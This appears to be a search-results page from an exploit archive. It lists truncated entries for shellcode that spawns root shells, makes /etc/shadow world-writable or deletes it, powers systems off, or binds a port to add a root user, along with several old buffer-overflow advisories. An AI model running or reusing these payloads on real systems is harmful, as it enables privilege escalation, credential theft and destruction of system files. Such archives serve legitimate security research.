1131 matches found
Linux/x86 - chmod 0777 /etc/shadow obfuscated 84 bytes
Linux/x86 - chmod 0777 /etc/shadow obfuscated 84 bytes. Shellcode exploit for linx86 platform / Linux x86 - execve chmod 0777 /etc/shadow Obfuscated version - 84 bytes Original: http://shell-storm.org/shellcode/files/shellcode-828.php Author: xmgv Details:...
Linux MIPS execve 36 bytes
Linux MIPS execve 36 bytes. Shellcode exploit for linux platform Exploit Title: 36byte Linux MIPS execve Date: 2015 - 1 - 20 Exploit Author: Sanguine Vendor Homepage: http://sangu1ne.tistory.com/ include / Sanguine@debian-mipsel:/leaveret cat MIPS36bsc.s .section .text .globl start .set noreorder...
linux/x86 Run /usr/bin/python | setreuid(),execve() - 54 Bytes
Exploit Title: Shellcode Linux x86 Run /usr/bin/python | setreuid,execve Date: 31/7/2014 Exploit Author: Ali Razmjoo Tested on: kali-linux-1.0.4-i386 3.7-trunk-686-pae 1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux / Ali Razmjoo , email protected Shellcode Linux x86 Run /usr/bin/python | setreuid,exec...
Linux x86 - Socket Re-use Shellcode 50 bytes
Linux x86 - Socket Re-use Shellcode 50 bytes. CVE-2014-4943. Shellcode exploit for linx86 platform / Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes Made using sockfd trick + dup20,0, dup20,1, dup20,2 + execve /bin/sh Thanks: Charles Stevenson, ipv, 3LRVS research team gcc -o...
Linux 2.4 Kernel execve() System Call Race Condition Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8042/info A race condition vulnerability has been discovered in the Linux execve system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the...
linux/x86 bindport 8000 & add user with root access 225+ bytes
No description provided by source. ; ; Title : Bindport TCP/8000 & execve add user with access root ; os : Linux x86 ; size : 225+ bytes ; IP : localhost ; Port : 8000 ; Use : nc localhost 8000 ; ; Author : Jonathan Salwan ; Mail : submit AT shell-storm.org ; Web : http://www.shell-storm.org ; ; ...
sco/x86 execve("/bin/sh", ..., NULL); 43 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 SCOSV scosysv 3.2 5.0.7 i386, execve/bin/sh, ..., NULL; / include sys/types.h include stdio.h char scode = \x31\xc9 // xor %ecx,%ecx \x89\xe3 // mov %esp,%ebx \x68\xd0\x8c\x97\xff // push $0xff978cd0 \x68\xd0\x9d\x96\x91...
linux/x86 execve /bin/sh setreuid(12,12) 50 bytes
No description provided by source. / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12, 12; / include stdio.h char c0de = / main: / / setregid12, 12; / \x29\xc0 / subl %eax, %eax / \xb0\x47 / movb $71, %al / \x29\xdb / subl %ebx, %ebx / / Here's the GI...
BSD 4.2 fingerd buffer overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2/info fingerd is a remote user information server that implements the protocol defined in RFC742. There exists a buffer overflow in finderd that allows a remote attacker to execute any local binaries. finderd reads input...
solaris/x86 setuid(0), execve(//bin/sh); exit(0) NULL Free 39 bytes
No description provided by source. / ; sm4x 2008 ; setuid0, execve'/bin/sh', '/bin/sh', 0, ; 39 bytes NizzULL free you know... ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; quick port to drop root sh - ; - SunOS is pwnij global start start: xor eax, eax ; --- setuid0 push eax push eax mov a...
Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes
No description provided by source. / Linux/SuperH - sh4 - setuid0 ; execve/bin/sh, NULL, NULL - 27 bytes Tested on debian-sh4 2.6.32-5-sh7751r by Jonathan Salwan - twitter: @jonathansalwan 400054: 17 e3 mov 23,r3 400056: 4a 24 xor r4,r4 400058: 0b c3 trapa 11 40005a: 3a 23 xor r3,r3 40005c: 0b e3...
[Raspberry Pi] Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 30 bytes
No description provided by source. / Title: Linux/ARM - execve/bin/sh, 0, 0 vars - 30 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l Author: midnitesnake 00008054 start: 8054: e28f6001 add r6, pc, 1 8058: e12fff16 bx r6 805c: 4678 mov r0, pc 805e: 300a adds r0, 10 8060: 9001 str r0, sp, 4 806...
55 bytes SLoc-DoS shellcode by Magnefikko
No description provided by source. include stdio.h include string.h / by Magnefikko 14.04.2010 [email protected] Promhyl Studies :: http://promhyl.oz.pl Subgroup: PRekambr Name: 55 bytes SLoc-DoS shellcode Platform: Linux x86 unlink/etc/shadow; execvepoweroff, 0, 0; gcc -Wl,-z,execstack...
Linux - setuid(0) & execve("/sbin/poweroff -f")
No description provided by source. include stdio.h / linux/x86 ; setuid0 & execve/sbin/poweroff -f 47 bytes written by ka0x - ka0x01alt+64gmail.com lun sep 21 16:40:16 CEST 2009 greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek, Hendrix and others! / int main char shellcode...
XFree86 4.2 XLOCALEDIR Local Buffer Overflow Vulnerability (3)
No description provided by source. source: http://www.securityfocus.com/bid/7002/info Several XFree86 utilities may be prone to a buffer overflow condition. The vulnerability exists due to insufficient boundary checks performed by these utilities when referencing the XLOCALEDIR environment...
14 Bytes execve("a->/bin/sh") Local-only Shellcode
No description provided by source. include stdio.h include string.h / by Magnefikko 17.04.2010 [email protected] Promhyl Studies :: http://promhyl.oz.pl Subgroup: PRekambr Name: 14 bytes execvea-/bin/sh local-only shellcode Platform: Linux x86 execvea, 0, 0; $ ln -s /bin/sh a $ gcc...
linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes
No description provided by source. / Linux/x86 setuid0 + setgid0 + execve/bin/sh, /bin/sh, NULL - 37 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x6a\x2e // push $0x2e \x58 // pop %eax \x53 // push %ebx...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytes
No description provided by source. / Linux/x86 execve/bin/sh, /bin/sh, NULL - 25 bytes - [email protected] / char shellcode = \x31\xc0 // xor %eax, %eax \x50 // push %eax \x68\x2f\x2f\x73\x68 // push $0x68732f2f \x68\x2f\x62\x69\x6e // push $0x6e69622f \x89\xe3 // mov %esp, %ebx \x50 // push %eax...
Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
No description provided by source. / Title: Solaris/x86 - execve/bin/sh,/bin/sh,NULL - 27 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan Date: 2010-05-19 Tested: SunOS opensolaris 5.11 snv111b i86pc i386 i86pc...
execve of /bin/sh after setreuid(0,0)
No description provided by source. / $Id: execve-setreuid.c,v 1.1 2001/05/02 18:10:52 raptor Exp $ execve-setreuid.c v1.0 - shellcode for Linux/i386 Copyright c 2001 Raptor [email protected] This shellcode does an execve of /bin/sh after a setreuid0, 0, then exits. / / ASM Code ; setreuid0...